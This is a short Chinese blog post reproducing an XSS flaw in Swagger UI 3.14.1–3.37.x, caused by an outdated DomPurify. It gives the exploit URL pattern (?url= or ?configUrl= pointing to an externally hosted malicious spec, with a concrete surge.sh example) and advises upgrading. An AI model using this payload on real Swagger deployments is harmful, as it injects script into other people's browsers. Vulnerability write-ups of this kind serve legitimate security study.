Linux 第十八章

颜路在路上

 关注

阅读 18

2024-05-03

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户
根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗
json网站:https://jumpy-floor.surge.sh/test.yaml
拼接方式
?url=https://your_api_spec/spec.yaml
?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问
在这里插入图片描述
进行拼接?url=https://jumpy-floor.surge.sh/test.yaml
在这里插入图片描述
弹窗

修复建议:

升级到最新

相关推荐

第十八章 算法

_鱼与渔_ 10 0 0

cppPrimer第十八章习题

朱悟能_9ad4 30 0 0

第十八章 SQL函数 ASCII

乐百川 41 0 0

第十八章 Swing 程序设计

guanguans 57 0 0

第十八章:浏览器检测

绣文字 45 0 0

MySQL是怎样运行的——第十八章

戴老师成长记录仪 84 0 0

Flutter第十八章(套接字WebSocket初识)

书呆鱼 103 0 0

慕课编译原理(第十八章.小结)

沈芏 87 0 0

Java 基础入门 | 第十八章 Java反射机制

狗啃月亮_Rachel 68 0 0

第十八章:Java编程之字符串

爱动漫建模 36 0 0

精彩评论(0)

0 0 举报